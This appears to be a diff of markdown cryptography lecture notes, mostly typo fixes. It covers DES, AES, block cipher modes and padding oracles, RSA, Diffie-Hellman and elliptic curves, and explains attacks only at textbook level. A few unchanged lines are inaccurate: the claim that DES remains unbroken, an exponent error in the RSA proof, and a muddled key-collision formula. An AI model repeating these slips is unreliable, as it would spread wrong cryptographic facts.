- 3 rounds are sufficient to make a pseudorandom permutation
|
||||
- 4 rounds are sufficient to make a strong pseudorandom permutation
|
||||
- Balanced Feistal networks
|
||||
- Balanced Feistel networks
|
||||
- L and R are equal sizes
|
||||
- Unbalanced feistal networks
|
||||
- Unbalanced Feistel networks
|
||||
- L and R can be different sizes
|
||||
- e.g. `skipjack`, `OAEP`
|
||||
|
||||
@@ -78,7 +78,7 @@ Basically the `xor`s cancel themselves out, the most important part is choosing
|
||||
|
||||
1976: NIST accepts an altered version of DES following consultation with NSA
|
||||
|
||||
- Feistal network with 64-bit block size
|
||||
- Feistel network with 64-bit block size
|
||||
- 56-bit key
|
||||
- The most studied cipher in history
|
||||
- Hasn’t been broken for over 46 years
|
||||
@@ -93,7 +93,7 @@ This speeds up loading bits into registers
|
||||
|
||||

|
||||
|
||||
$S_1, S_2....$ are called s-boxes. These substitute 6 bits input to 4 bits output based on lookup tables. The lookup tables for each s-box is different.
|
||||
$S_1, S_2....$ are called s-boxes. These substitute 6-bit inputs with 4-bit outputs based on lookup tables. The lookup tables for each s-box are different.
|
||||
|
||||
##### Expansion
|
||||
|
||||
@@ -107,7 +107,7 @@ $S_1, S_2....$ are called s-boxes. These substitute 6 bits input to 4 bits outpu
|
||||
##### Substitution Boxes
|
||||
|
||||
- Add confusion
|
||||
- The s-boxes map 6 bit inputs to 4-bit outputs
|
||||
- The s-boxes map 6-bit inputs to 4-bit outputs
|
||||
- There are 8 s-boxes in total, each is different
|
||||
|
||||

|
||||
@@ -127,7 +127,7 @@ $S_1, S_2....$ are called s-boxes. These substitute 6 bits input to 4 bits outpu
|
||||
|
||||
##### Permutation
|
||||
|
||||
- At the end of $f()$ is a permuatation
|
||||
- At the end of $f()$ is a permutation
|
||||
- This moves bits between s-boxes on the next round
|
||||
|
||||

|
||||
@@ -138,10 +138,10 @@ $S_1, S_2....$ are called s-boxes. These substitute 6 bits input to 4 bits outpu
|
||||
|
||||
If you input all 0s, we will see a random cipher text
|
||||
|
||||
However if we change one 0 to a 1, how does this effect the result.
|
||||
However, if we change one 0 to a 1, how does this affect the result?
|
||||
|
||||
- On average, if you change one (first) bit in $R$, one bit will change in the expansion
|
||||
- Due to the way the s-boxes are setup, at least 2 of the 4 bits in the output will be different
|
||||
- Due to the way the s-boxes are set up, at least 2 of the 4 bits in the output will be different
|
||||
- Now when the permutation happens, these two changes are spread to other s-boxes
|
||||
- Now next round we’ll get 4 changes, then 8, then 16 …
|
||||
|
||||
|
||||
@@ -7,7 +7,7 @@
|
||||
|
||||
##### PC-1
|
||||
|
||||
- Permutated Choice 1 (PC-1) selects 56 of the 64 bits
|
||||
- Permuted Choice 1 (PC-1) selects 56 of the 64 bits
|
||||
- The other ‘parity’ bits are discarded: DES only uses a 56-bit key
|
||||
- Key bits are spread throughout the initial state of the key schedule
|
||||
- Key bits 8, 16, 24,…64 are not used
|
||||
@@ -16,14 +16,14 @@
|
||||
|
||||
#### Left Rotation
|
||||
|
||||
- Left rotations (often written as `<<<`) represent a lift shift where the left most numbers wrap around to the right hand side
|
||||
- Left rotations (often written as `<<<`) represent a left shift where the leftmost numbers wrap around to the right-hand side
|
||||
- In DES, each 28-bit block is rotated left by `<<<1` for rounds 1,2,9,16 and `<<<2` otherwise
|
||||
- The total rotation is $4\cdot 1 + 12\cdot 2 = 28$ which means $C_0 = C_{16}$ and $D_0 = D_{16}$
|
||||
- NOTE: $C_0$ or $D_0$ is not used
|
||||
|
||||
##### PC-2
|
||||
|
||||
- Permuted Choice 2 select 48 of the 56 bits to be used as a round key
|
||||
- Permuted Choice 2 selects 48 of the 56 bits to be used as a round key
|
||||
|
||||

|
||||
|
||||
@@ -31,8 +31,8 @@
|
||||
|
||||
- Is entirely permutation based
|
||||
- Doesn’t use `xor`, addition or any other mixing operation
|
||||
- Because $C_0 = C_{16}$ and $D_0 = D_{16}$ we don’t need to write seperate encrpt and decrypt functions
|
||||
- Usful for writing implementations on low memory devices (smart cards)
|
||||
- Because $C_0 = C_{16}$ and $D_0 = D_{16}$ we don’t need to write separate encrypt and decrypt functions
|
||||
- Useful for writing implementations on low-memory devices (smart cards)
|
||||
|
||||
### Breaking DES
|
||||
|
||||
@@ -47,7 +47,7 @@ NOTE: $2^{56}-1$ is a very large number
|
||||
|
||||
#### Key Collisions
|
||||
|
||||
- For a 56-bit key but a 64-bit block is possible (though unlikely) a different key would work
|
||||
- For a 56-bit key but a 64-bit block, it is possible (though unlikely) that a different key would work
|
||||
- How likely is this to happen for a 1 bit key and an $n$ bit block cipher
|
||||
- $\frac{2^l}{2^n}$ where $l$ is the length of the block and $n$ is the key length
|
||||
- $\frac{2^{64}}{2^{56}} = 2^8$
|
||||
@@ -64,15 +64,15 @@ NOTE: $2^{56}-1$ is a very large number
|
||||
|
||||

|
||||
|
||||
- Naive brute fource suggests $2^{56}\cdot 2^{56} = 2^{112}$ keyspace
|
||||
- However using a meet-in-the middle attack this becomes trival.
|
||||
- Naive brute force suggests $2^{56}\cdot 2^{56} = 2^{112}$ keyspace
|
||||
- However, using a meet-in-the-middle attack, this becomes trivial.
|
||||
- Step 1: Calculate encryptions of $x_1$ for all $k_{1...,i}$ and store intermediate values $Z_{1..,i}$
|
||||
- Step 2: Calculate all decryptions of $y_1$ for all $k_{R, j}$ to find $Z_{R,i}$
|
||||
- Step 3: Find any value of $Z_{R,j}$ matching existing $Z_L,i$
|
||||
|
||||

|
||||
|
||||
Meet-in-the-middle requires $2^{k+1}$ attemps rather than $2^{k\cdot 2}$
|
||||
Meet-in-the-middle requires $2^{k+1}$ attempts rather than $2^{k\cdot 2}$
|
||||
|
||||
- This is much better than brute force, but doesn’t make it easy
|
||||
- Trades off computation for storage - Petabytes for DES
|
||||
@@ -100,8 +100,8 @@ This is why banking systems use 3DES as they already have the infrastructure for
|
||||
|
||||

|
||||
|
||||
- Theoretically this provides a seach space of $2^{k+2n}$ but meet-in-the-middle can be used here, as well as other more advanced attacks
|
||||
- In practive securtity is $2^{k+n-m}$ where an attack has $2^m$ known plain texts
|
||||
- Theoretically this provides a search space of $2^{k+2n}$ but meet-in-the-middle can be used here, as well as other more advanced attacks
|
||||
- In practice, security is $2^{k+n-m}$ where an attack has $2^m$ known plain texts
|
||||
|
||||
# Cryptanalysis
|
||||
|
||||
@@ -115,7 +115,7 @@ This is why banking systems use 3DES as they already have the infrastructure for
|
||||
|
||||
##### Analytical Attacks
|
||||
|
||||
- Exploit some underlying structureal or mathematical weakness in a cipher
|
||||
- Exploit some underlying structural or mathematical weakness in a cipher
|
||||
- e.g. meet in the middle attack
|
||||
- Derivation of taps in LFSRs
|
||||
|
||||
@@ -127,7 +127,7 @@ This is why banking systems use 3DES as they already have the infrastructure for
|
||||
|
||||
###### Differential Cryptanalysis
|
||||
|
||||
- Different cryptanalysis is prehaps now the most important modern method for breaking block ciphers
|
||||
- Differential cryptanalysis is perhaps now the most important modern method for breaking block ciphers
|
||||
- It is a **chosen plaintext** attack
|
||||
- We aim to find predictable changes in output bits caused by known changes in the input bits
|
||||
|
||||
@@ -151,5 +151,5 @@ This is why banking systems use 3DES as they already have the infrastructure for
|
||||
- AES has a maximum likelihood of a differential per s-box of $2^{-6}$
|
||||
- This is because AES has such good diffusion
|
||||
- More rounds make differentials even less likely
|
||||
- Good permuation to involve more s-boxes is vital
|
||||
- Good permutation to involve more s-boxes is vital
|
||||
- DES was specifically designed to resist this kind of attack
|
||||
@@ -26,7 +26,7 @@ A group is a set of elements $G$ together with an operation $\circ$ that combine
|
||||
- The set of integers $\mathbb{Z}_m = \{0,1,...m-1\}$ with the operation addition modulo m form a group with the neutral element 0
|
||||
- Every element would have an inverse where $a + (-a) = 0$ mod m
|
||||
- This group would not form a group with multiplication, as not all elements would have an inverse
|
||||
- We wouldn’t have an inverse, we would need $5\times \frac15=1$ however $\frac15 \notin \mathbb{Z}$
|
||||
- We wouldn’t have an inverse; we would need $5\times \frac15=1$, but $\frac15 \notin \mathbb{Z}$
|
||||
|
||||
### Fields
|
||||
|
||||
@@ -40,7 +40,7 @@ A field $F$ is a set of elements with the following properties
|
||||
##### Example Field
|
||||
|
||||
- The set of real numbers $\mathbb{R}$ is a field with neutral element 0 for addition and 1 for multiplication
|
||||
- Every real number $a$ has a additive inverse $-a$
|
||||
- Every real number $a$ has an additive inverse $-a$
|
||||
- Every non-zero number $a$ has a multiplicative inverse $\frac{1}{a}$
|
||||
|
||||

|
||||
@@ -97,7 +97,7 @@ The coefficients of the polynomial are elements in $GF(2)$ the **sub-field**
|
||||
##### Example $GF(2^3)$
|
||||
|
||||
- The field $GF(2^3)$, sometimes called $GF(8)$ is an extension field containing elements of the form: $A(x) = a_2 x^2 + a_1x^1 + a_0$
|
||||
- Its often easier to simply write the coefficients $(a_2, a_1, a_0)$ e.g. 001 or 101
|
||||
- It's often easier to simply write the coefficients $(a_2, a_1, a_0)$ e.g. 001 or 101
|
||||
- $GF(2^3) = \{0, 1, x, x+1, x^2, x^2+1, x^2 + x, x^2 + x + 1\}$
|
||||
- $|GF(2^3)| = 8$
|
||||
|
||||
@@ -130,7 +130,7 @@ $$
|
||||
|
||||
- Inversion is performed in a similar way to prime fields, we find:
|
||||
- $A(x) \cdot A^{-1}(x) \equiv 1 \space (mod \space P(x))$
|
||||
- $A^{-1}(x)$ is calculated using the extended euclidean algorithm
|
||||
- $A^{-1}(x)$ is calculated using the extended Euclidean algorithm
|
||||
|
||||
### AES’ Finite Field
|
||||
|
||||
|
||||
@@ -19,12 +19,12 @@ First row doesn’t move, second row is shifted to the left by 1, the third row
|
||||
|
||||
Then, when the columns are mixed, this means the overall diffusion is extremely good
|
||||
|
||||
The last round doesn’t have a **mix column** step as its reversible and wouldn’t add additional security.
|
||||
The last round doesn’t have a **mix column** step as it's reversible and wouldn’t add additional security.
|
||||
|
||||
#### S-Box
|
||||
|
||||
- The AES s-box is based around the multiplicative inverse of 8-bit values in $GF(2^8)$
|
||||
- This is strongly *non-linear* mapping
|
||||
- This is a strongly *non-linear* mapping
|
||||
|
||||
$$
|
||||
A_i \cdot A_i^{-1} \equiv 1 \space (mod \space P(x)) \\
|
||||
@@ -46,7 +46,7 @@ Remember an affine transformation is a multiplication and addition by two consta
|
||||
|
||||
##### S-box Properties
|
||||
|
||||
- The s-box simply described, and is bijective, an invertible 1:1 mapping
|
||||
- The s-box is simply described, and is bijective, an invertible 1:1 mapping
|
||||
- It has no fixed points
|
||||
- i.e. no $A_i$ for which $S(A_i) = A_i$
|
||||
- No inverse fixed points
|
||||
@@ -92,9 +92,9 @@ When multiplying by $x$, there’s a shortcut we can implement. We can set the e
|
||||
|
||||
### Implementation
|
||||
|
||||
1. All addition and subtractions are `xor`
|
||||
1. All additions and subtractions are `xor`
|
||||
|
||||
2. Multiply by `01` has no effect
|
||||
2. Multiplying by `01` has no effect
|
||||
|
||||
3. Multiplying by `02` (which is $x$) is simply a left shift followed by modular reduction
|
||||
|
||||
@@ -102,7 +102,9 @@ When multiplying by $x$, there’s a shortcut we can implement. We can set the e
|
||||
|
||||
- If the original $x^7$ bit was set, then we must `xor` with `0x1B`
|
||||
|
||||
- ```java
|
||||
- Example:
|
||||
|
||||
```java
|
||||
// xtime
|
||||
if ((a & 0x80) > 0) {
|
||||
a = (a << 1) ^ 0x1b;
|
||||
@@ -111,23 +113,27 @@ When multiplying by $x$, there’s a shortcut we can implement. We can set the e
|
||||
}
|
||||
```
|
||||
|
||||
4. Multiply by `03` ($x+1$) is simply `xtime(a) ^ a`
|
||||
4. Multiplying by `03` ($x+1$) is simply `xtime(a) ^ a`
|
||||
|
||||
- Inverse multiplications are by `09`, `11`, `13`, `14`. these require either a more general function or lookup tables
|
||||
- Inverse multiplications are by `09`, `11`, `13`, `14`. These require either a more general function or lookup tables
|
||||
|
||||
- Consider the sum:
|
||||
|
||||
- $$
|
||||
- Product:
|
||||
|
||||
$$
|
||||
a = x^6 + x^4 + x^2 + 1 \\
|
||||
b = x^7 + x^4 + x^2 + x \\
|
||||
\therefore a\cdot b = a\cdot x^7 + a\cdot x^4 + a\cdot x^2 + a\cdot x
|
||||
$$
|
||||
|
||||
- $$
|
||||
- Repeated multiplication:
|
||||
|
||||
$$
|
||||
a\curvearrowright a\cdot x \curvearrowright a\cdot x^2 \curvearrowright a\cdot x^3 \curvearrowright a\cdot x^4 \curvearrowright a\cdot x^5
|
||||
$$
|
||||
|
||||
- Here in $a\cdot b$, $a$ is just being multiplied by various powers of $x$. This can be easily calculated by repeated multiplying $a$ by $x$.
|
||||
- Here in $a\cdot b$, $a$ is just being multiplied by various powers of $x$. This can be easily calculated by repeatedly multiplying $a$ by $x$.
|
||||
|
||||
- AES is very **fast in software** and pretty **fast in hardware**
|
||||
|
||||
@@ -135,7 +141,7 @@ When multiplying by $x$, there’s a shortcut we can implement. We can set the e
|
||||
|
||||
- Much of the algorithm can be converted into a series of lookup tables
|
||||
|
||||
- **Trade off** between **speed** and **space**
|
||||
- **Trade-off** between **speed** and **space**
|
||||
|
||||
- There are numerous cache-timing and other attacks possible
|
||||
|
||||
|
||||
@@ -5,7 +5,7 @@
|
||||
- Most messages don’t come in convenient 128-bit block lengths
|
||||
- We’ll need to run a block cipher repeatedly on consecutive blocks
|
||||
- Why not use stream ciphers?
|
||||
- Historically stream ciphgers have proven harder to implement
|
||||
- Historically, stream ciphers have proven harder to implement
|
||||
|
||||
##### Padding
|
||||
|
||||
@@ -13,15 +13,17 @@
|
||||
- Public Key Cryptography Standards `PKCS7` is a common padding scheme:
|
||||
1. Padding bytes are always added to the plaintext **before it is encrypted**
|
||||
2. Each padding byte has a *value equal to the total number of padding bytes* that are added
|
||||
3. The total number of padding bytes is **atleast one**
|
||||
3. The total number of padding bytes is **at least one**
|
||||
|
||||
- 
|
||||
|
||||
- Note in this example there are 7 `7`s and 16 `16`s
|
||||
- Note the bottom left example there is 1 `1`. This could be interpreted as 1 bytes of padding or some plaintext. This is why every block must contain at least one padding byte
|
||||
- Note that in the bottom-left example there is 1 `1`. This could be interpreted as 1 byte of padding or some plaintext. This is why every block must contain at least one padding byte
|
||||
|
||||
### Electronic Code Book Mode (ECB)
|
||||
|
||||
- Just encrypt each block one after another
|
||||
- This is quick as can be easily parallelised
|
||||
- This is quick as it can be easily parallelised
|
||||
|
||||

|
||||
|
||||
@@ -44,7 +46,7 @@
|
||||
### Deterministic vs Probabilistic Encryption
|
||||
|
||||
- An encryption scheme is **deterministic** if some plaintext is mapped to a fixed ciphertext if the key is unchanged
|
||||
- ECB is deterministic, but most modern modes of operation of **probabilistic**
|
||||
- ECB is deterministic, but most modern modes of operation are **probabilistic**
|
||||
- Probabilistic encryption schemes add randomness to the encryption process to achieve a non-deterministic generation of the ciphertext
|
||||
|
||||

|
||||
@@ -85,21 +87,23 @@ $$
|
||||
|
||||
- CBC was the primary method of encryption for many years
|
||||
- Now it is less common
|
||||
|
||||
- 
|
||||
|
||||
- If you flip the first bit in $y_2$, the same bit is flipped for $x_3$
|
||||
- Changing $y_2$ means $x_2$ no longer decrypts properly
|
||||
|
||||
### Padding Oracles
|
||||
|
||||
- Here, an **oracle** is a system we can query and it will tell us if, once decrypt, some text has **valid padding**
|
||||
- Here, an **oracle** is a system we can query and it will tell us if, once decrypted, some text has **valid padding**
|
||||
- A system is unlikely to tell you directly, but it might give away some clue
|
||||
- Image an example `api` that receives a CBC encrypted authorisation token
|
||||
- Imagine an example `api` that receives a CBC-encrypted authorisation token
|
||||
|
||||

|
||||
|
||||
#### Padding Oracle Attacks
|
||||
|
||||
- Lets look at a single decryption block in CBC
|
||||
- Let's look at a single decryption block in CBC
|
||||
- The attack is essentially the same for multiple blocks, just one at a time
|
||||
- You attack the last block, which contains the padding
|
||||
|
||||
@@ -129,9 +133,9 @@ $$
|
||||
|
||||
- Extends counter mode to add authenticity
|
||||
- The sender definitely sent that message and it hasn’t been modified
|
||||
- Very similar to ocunter mode, but **adds authentication tag**
|
||||
- Very similar to counter mode, but **adds an authentication tag**
|
||||
- Uses multiplication in a Galois Finite field $GF(2^{128})$ modulo $x^{128} + x^7 + x^2 + x + 1$
|
||||
- Extremely parallelsiable
|
||||
- Extremely parallelisable
|
||||
- Robust to message modification
|
||||
- Is now standard in `TLS1.3`
|
||||
|
||||
|
||||
@@ -11,7 +11,7 @@ $$
|
||||
|
||||
#### Euclidean Algorithm
|
||||
|
||||
- The euclidean algorithm calculates the greatest common divisor of two numbers $gcd(r_0, r_1)$
|
||||
- The Euclidean algorithm calculates the greatest common divisor of two numbers $gcd(r_0, r_1)$
|
||||
- This is the largest number that divides both $r_0$ and $r_1$
|
||||
- If $gcd(x,y)=1$ then $x$ and $y$ are **coprime** (sometimes called relatively prime)
|
||||
- The Euclidean algorithm is based around the fact:
|
||||
@@ -19,7 +19,7 @@ $$
|
||||
|
||||

|
||||
|
||||
- Computing $(x-y)\cdot gcd(r_0, r_1)$ is easier as its a smaller number
|
||||
- Computing $(x-y)\cdot gcd(r_0, r_1)$ is easier as it's a smaller number
|
||||
- Doing this repeatedly is slow, we can use $gcd(r_0,r_1) = gcd(r_1, r_0\space mod \space r_1)$
|
||||
|
||||

|
||||
@@ -37,16 +37,16 @@ $r_0=q\cdot r_1 + r_2 \\57=4\cdot 12 + 9\\ r_1=q\cdot r_2 + r_3 \\ 12=1\cdot 9 +
|
||||
|
||||

|
||||
|
||||
#### Bezout’s Identity
|
||||
#### Bézout’s Identity
|
||||
|
||||
- Bezout’s identity tells us that the greatest common divisor of two numbers can be expressed as the sum of multiples of these numbers
|
||||
- Bézout’s identity tells us that the greatest common divisor of two numbers can be expressed as the sum of multiples of these numbers
|
||||
- $gcd(r_0,r_1) = s\cdot r_0 + t\cdot r_1$
|
||||
- e.g. $gcd(99,20)=-1\cdot 99+5\cdot 20=1$
|
||||
- $gcd(141,50)=11\cdot 141+-31\cdot 50=1$
|
||||
|
||||
##### Extended Euclidean Algorithm
|
||||
|
||||
- The extended euclidean algorithm calculates the $gcd(r_0,r_1)$ as normal, and in addition calculates $s$ and $t$.
|
||||
- The extended Euclidean algorithm calculates the $gcd(r_0,r_1)$ as normal, and in addition calculates $s$ and $t$.
|
||||
|
||||
| Euclidean Algorithm | Extended Euclidean Algorithm |
|
||||
| ---------------------------------- | ------------------------------------------------------------ |
|
||||
@@ -81,4 +81,3 @@ $$
|
||||
$$
|
||||
|
||||
Where $t$ is our multiplicative inverse
|
||||
|
||||
@@ -33,8 +33,6 @@
|
||||
- $gcd(7,9)=1$ :white_check_mark:
|
||||
- $gcd(8,9)=1$ :white_check_mark:
|
||||
|
||||
###
|
||||
|
||||
#### Integer Factorisation
|
||||
|
||||
- Any integer can be expressed as the multiplication of a list of prime numbers
|
||||
@@ -86,7 +84,7 @@ $$
|
||||
4. Choose a value $e\in \{2, ..., \Phi(n) -1\}$ where $gcd(\Phi(n),e)=1$
|
||||
5. Compute $d$ where $d\cdot e \equiv 1 \space (mod \space \Phi(n))$
|
||||
|
||||

|
||||

|
||||
|
||||
$d$ is very easy to calculate if you know $p$ and $q$
|
||||
|
||||
@@ -97,7 +95,7 @@ $d$ is very easy to calculate if you know $p$ and $q$
|
||||
##### Encryption
|
||||
|
||||
- Now we have a public key $(3, 187)$ and private key $107$
|
||||
- Encryption and decryption is performed by:
|
||||
- Encryption and decryption are performed by:
|
||||
- $x^e \equiv y \space (mod \space n)$
|
||||
- $y^d \equiv x \space (mod \space n)$
|
||||
|
||||
@@ -106,7 +104,7 @@ $d$ is very easy to calculate if you know $p$ and $q$
|
||||
#### Proof
|
||||
|
||||
- We want to show that $(x^e)^d = x^{ed} \equiv x \space (mod \space n)$
|
||||
- Let’s assume $gcd(x,n)=1$ So Euler’s theorem applies
|
||||
- Let’s assume $gcd(x,n)=1$, so Euler’s theorem applies
|
||||
- $e\cdot d=1\space (mod \space \Phi(n))$
|
||||
- $\therefore e\cdot d = 1 + k\cdot \Phi(n)$
|
||||
- $x^{e\cdot d} = x^{1+k\cdot \Phi(n)} = x\cdot x^{k+\Phi(n)}$
|
||||
@@ -129,7 +127,7 @@ x^4 = x^2 \cdot x^2 \\
|
||||
x^8 = x^4 \cdot x^4
|
||||
$$
|
||||
|
||||
When calculating a exponent raised to a power of two, we can use previously calculated values.
|
||||
When calculating an exponent raised to a power of two, we can use previously calculated values.
|
||||
|
||||
##### Binary Exponentiation
|
||||
|
||||
@@ -160,6 +158,5 @@ $$
|
||||
- What is the computational complexity of exponentiation?
|
||||
- For a 2048 key:
|
||||
- $X^{2^{2048}}$ - A ridiculously big number
|
||||
- Where as using square and multiply
|
||||
- Whereas using square and multiply
|
||||
- $2048=T$ we need $\frac{3T}{2}$ calculations
|
||||
|
||||
@@ -21,11 +21,11 @@ $$
|
||||
|\mathbb{Z}_m^*| = \Phi(n) \\
|
||||
$$
|
||||
|
||||
- The security of ciphers often depend on the cardinality of the group
|
||||
- The security of ciphers often depends on the cardinality of the group
|
||||
|
||||
#### Cyclic Groups
|
||||
|
||||
- Lets consider group $\mathbb{Z}_{11}^*$
|
||||
- Let's consider group $\mathbb{Z}_{11}^*$
|
||||
- Consider calculating powers of 3 in this group
|
||||
|
||||
$$
|
||||
@@ -82,7 +82,9 @@ $$
|
||||
2. $ord(g)$ divides $|G|$
|
||||
- These are called **cyclic subgroups**
|
||||
- Orders of $\mathbb{Z}_{11}^*$
|
||||
|
||||
- 
|
||||
|
||||
- Note the neutral element generates an order of $1$
|
||||
|
||||
## Diffie-Hellman
|
||||
@@ -92,7 +94,7 @@ $$
|
||||
- Where $a\in \{1,2,...,p-1\}$
|
||||
- and $b\in \{1,2,...,p-1\}$
|
||||
3. Alice calculates $A=g^a\space mod \space p$ and sends $A$ publicly to Bob
|
||||
4. Bob calculates $B=g^b\space mod \space p$ and sends $B$ pubicly to Alice
|
||||
4. Bob calculates $B=g^b\space mod \space p$ and sends $B$ publicly to Alice
|
||||
5. Alice computes $k_{ab}=B^a\space mod \space p$
|
||||
6. Bob computes $k_{ab}=A^b\space mod \space p$
|
||||
|
||||
@@ -111,7 +113,7 @@ $$
|
||||
|
||||
**Brute Force** requires $O(|G|)$
|
||||
|
||||
**Shank’s Baby-Step Giant-Step** requires $O(\sqrt{|G|})$ and $\sim \sqrt{|G|}$ space
|
||||
**Shanks’ Baby-Step Giant-Step** requires $O(\sqrt{|G|})$ and $\sim \sqrt{|G|}$ space
|
||||
|
||||
- Using 128 bits, this is $2^{64}$, which would need a cluster
|
||||
|
||||
@@ -121,7 +123,7 @@ $$
|
||||
|
||||
- The discrete log problem is solved mod each prime factor and the results combined using the Chinese remainder theorem
|
||||
|
||||
**Index calculus** directly attacks $\mathbb{Z}_p^*$ and is the reason Elliptic Curves is so much more efficient
|
||||
**Index calculus** directly attacks $\mathbb{Z}_p^*$ and is the reason elliptic curves are so much more efficient
|
||||
|
||||
##### Choosing Primes
|
||||
|
||||
@@ -131,5 +133,3 @@ $$
|
||||
- This will have two subgroups of order $p-1$ and $2$
|
||||
- By choosing a generator of the **subgroup of large prime order**, we avoid attacks on small factors of the group order
|
||||
- Basically this ensures the prime factorisation has one massive prime in it
|
||||
|
||||
|
||||
@@ -6,7 +6,7 @@ $$
|
||||
ax^2+by^2=r^2
|
||||
$$
|
||||
|
||||
- There are an infinite amount of solutions to this equation
|
||||
- There are an infinite number of solutions to this equation
|
||||
- However if we restrict to only integers ($\mathbb{Z}$) and use mod, we have a finite set
|
||||
|
||||
- We define an elliptic curve over points in $\mathbb{Z}_p, \space p>3$
|
||||
@@ -107,7 +107,7 @@ These are a pain as they don’t intersect the curve, we say they cross the curv
|
||||
|
||||
#### The Point $\mathcal O$ at Infinity
|
||||
|
||||
- The point at infinity is the neutral element on a elliptic curve
|
||||
- The point at infinity is the neutral element on an elliptic curve
|
||||
- $P+(-P)=\mathcal O$
|
||||
- $P+\mathcal O=P$
|
||||
- In practice the point doesn’t have coordinates, and can’t be used within the normal formula
|
||||
@@ -120,7 +120,7 @@ These are a pain as they don’t intersect the curve, we say they cross the curv
|
||||
### Cyclic Groups
|
||||
|
||||
- The points on an elliptic curve including the neutral element $\mathcal O$ form a cyclic subgroup
|
||||
- Under certain conditions all points for a cyclic group
|
||||
- Under certain conditions all points form a cyclic group
|
||||
|
||||

|
||||
|
||||
@@ -137,8 +137,10 @@ This is the graph modulus $p$
|
||||
|
||||
- Given a generator point, points on elliptic curves generate cyclic groups
|
||||
- $y^2 \equiv x^3+2x+2 \mod 17$
|
||||
|
||||
- 
|
||||
- Here the next two points is the point at infinity ($\mathcal O$) and then it loops back round to $(5,1)$
|
||||
|
||||
- Here the next two points are the point at infinity ($\mathcal O$) and then it loops back round to $(5,1)$
|
||||
- Each cyclic group includes the point at infinity
|
||||
|
||||
## Elliptic Curve Discrete Logarithm
|
||||
@@ -146,14 +148,14 @@ This is the graph modulus $p$
|
||||
- We can construct a DLP in a very similar way to the modular exponentiation equivalent
|
||||
- $aP = \underbrace{P+P+...+P}_{a \space\textrm{ times}} = A$
|
||||
- Given points $P$ and $A$, find scalar value $a$
|
||||
- Its important to remember the distinction between points on the curve, and integer values
|
||||
- It's important to remember the distinction between points on the curve and integer values
|
||||
- On elliptic curves, private keys such as $a$ are integers
|
||||
- Generators and public keys are points
|
||||
|
||||
#### Group Cardinality
|
||||
|
||||
- The size of cyclic groups is very important to the security
|
||||
- While easy to calculate for modular arithmetic, the number of points on a give elliptic curve is not so obvious
|
||||
- While easy to calculate for modular arithmetic, the number of points on a given elliptic curve is not so obvious
|
||||
- You might imagine that a curve would have $2p+1$ points, in reality it is fewer than this
|
||||
- This is closer to $p$
|
||||
- Hasse’s theorem states that for a curve $E$ over a field $\mathbb{Z}_p$, the number of elements $\#E$ is bounded by:
|
||||
@@ -163,21 +165,21 @@ This is the graph modulus $p$
|
||||
##### #E
|
||||
|
||||
- A large #E is very important to prevent various attacks on ECDLP
|
||||
- Calculating it exactly is hard, it can be done with Shoof’s algorithm
|
||||
- Calculating it exactly is hard; it can be done with Schoof’s algorithm
|
||||
- Various properties of #E enable or restrict certain attacks
|
||||
|
||||
##### How Hard is ECDLP
|
||||
|
||||
- There are generic algorithms like **Polig-Hellman** that are applicable to any category of DLP
|
||||
- Polig-Hellman requires $O(\sqrt{\#E})$ steps
|
||||
- These are generic attacks mean curves and parameters should be chosen with care
|
||||
- There are generic algorithms like **Pohlig-Hellman** that are applicable to any category of DLP
|
||||
- Pohlig-Hellman requires $O(\sqrt{\#E})$ steps
|
||||
- These generic attacks mean curves and parameters should be chosen with care
|
||||
- The most powerful attack on modular arithmetic based DLP is **index calculus**
|
||||
- It is this attack that forces modular arithmetic based crypto-systems to use >2000 bit keys
|
||||
- Index calculus does not work on elliptic curves so they only need to remain secure against generic attacks
|
||||
|
||||
#### Efficient Computation
|
||||
|
||||
- There is no nautral way of calculating $a\cdot P$
|
||||
- There is no natural way of calculating $a\cdot P$
|
||||
- Think back to binary exponentiation, square and multiply `->` double and add
|
||||
|
||||
| Decimal | Binary |
|
||||
@@ -199,13 +201,11 @@ E, \#E, G \\
|
||||
\mathrm{Bob}: a\in \{1,2,...,\#E-1\} \\
|
||||
$$
|
||||
|
||||
|
||||
|
||||
Alice takes point $G$ on the curve and add it to $a$: $A = a\cdot G$
|
||||
Alice takes point $G$ on the curve and adds it to $a$: $A = a\cdot G$
|
||||
|
||||
Bob does the same: $B=b\cdot G$
|
||||
|
||||
Alice takes bob’s public key $k_{ab} = a\cdot B$
|
||||
Alice takes Bob’s public key $k_{ab} = a\cdot B$
|
||||
|
||||
Bob does the same: $k_{ab}=b\cdot A$
|
||||
|
||||
@@ -244,7 +244,7 @@ Where each layer builds on the one beneath
|
||||
|
||||
- The choice of curve parameters influences both security and efficiency of crypto-systems based around ECs
|
||||
- Never use a randomly generated curve!
|
||||
- The chances are the number of points we generate will have a subgroup susecpible to Polig-Hellmen
|
||||
- The chances are the number of points we generate will have a subgroup susceptible to Pohlig-Hellman
|
||||
- Standard curves exist in various forms
|
||||
- Varied equations
|
||||
- Different implementation methods
|
||||
@@ -259,7 +259,7 @@ Where each layer builds on the one beneath
|
||||

|
||||
|
||||
- $h$ is the cofactor, the size of the subgroup in $G$
|
||||
- Because its 1 it means all the points are being generated
|
||||
- Because it's 1 it means all the points are being generated
|
||||
- If it was 2, only half of the points are being generated
|
||||
|
||||
##### secp256k1
|
||||
@@ -289,5 +289,5 @@ Where each layer builds on the one beneath
|
||||
#### Primary Applications
|
||||
|
||||
- Elliptic Curve Diffie Hellman
|
||||
- DSA Signatures scheme, based on Elgamal signatures
|
||||
- DSA signature scheme, based on Elgamal signatures
|
||||
- Similar schemes involving the alternative curves such as `Ed25519` and `Ed448`
|
||||
@@ -1,8 +1,8 @@
|
||||
# Elgamal Encryption
|
||||
|
||||
#### Extending Diffie-Hellmen to Encryption
|
||||
#### Extending Diffie-Hellman to Encryption
|
||||
|
||||
We could do is multiply the plain text by the key generated
|
||||
What we could do is multiply the plain text by the key generated
|
||||
|
||||
$y\equiv x\cdot k_{ab}\mod p \rightarrow x\equiv y\cdot k_{ab}^{-1}$
|
||||
|
||||
@@ -45,13 +45,13 @@ $y\equiv x\cdot k_{ab}\mod p \rightarrow x\equiv y\cdot k_{ab}^{-1}$
|
||||
|
||||
### Computational Efficiency
|
||||
|
||||
To calculate bobs private key we use one exponentiation
|
||||
To calculate Bob's private key we use one exponentiation
|
||||
|
||||
Alice has to do two binary exponentiation to send a message to bob
|
||||
Alice has to do two binary exponentiations to send a message to Bob
|
||||
|
||||

|
||||
|
||||
- Both the exponentiations during encryption can be pre-computed during down time
|
||||
- Both the exponentiations during encryption can be pre-computed during downtime
|
||||
- We can also improve on the decryption step using Fermat’s little theorem
|
||||
- Fermat’s Little Theorem: $a^{p-1}\equiv 1\mod p$
|
||||
